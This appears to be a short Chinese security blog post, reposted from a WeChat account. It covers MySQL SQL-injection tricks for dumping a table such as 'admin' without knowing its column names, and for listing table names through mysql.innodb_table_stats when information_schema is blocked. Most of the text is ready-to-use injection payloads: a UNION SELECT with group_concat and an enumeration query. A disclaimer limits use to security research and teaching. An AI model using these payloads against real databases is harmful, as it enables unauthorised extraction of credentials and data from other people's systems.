有时候我们不知道列名,因为不能访问Information_Schema或者其他原因
但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据
我们有两个表 article、admin
方案一
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x方案二
方案二是在exploit-db上看到的文章,Mysql版本大于5.5的情况下,
默认mysql数据库中多了两个表innodb_table_stats、innodb_table_index用来储存所有数据库名和表名
如果我们想获取某个数据库下面所有表名称
select table_name from mysql.innodb_table_stats where database_name=数据库名;https://www.exploit-db.com/docs/41274.pdf
本文始发于微信公众号(T00ls):【奇技淫巧】Mysql注入时,猜不到列名,获取所有数据
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论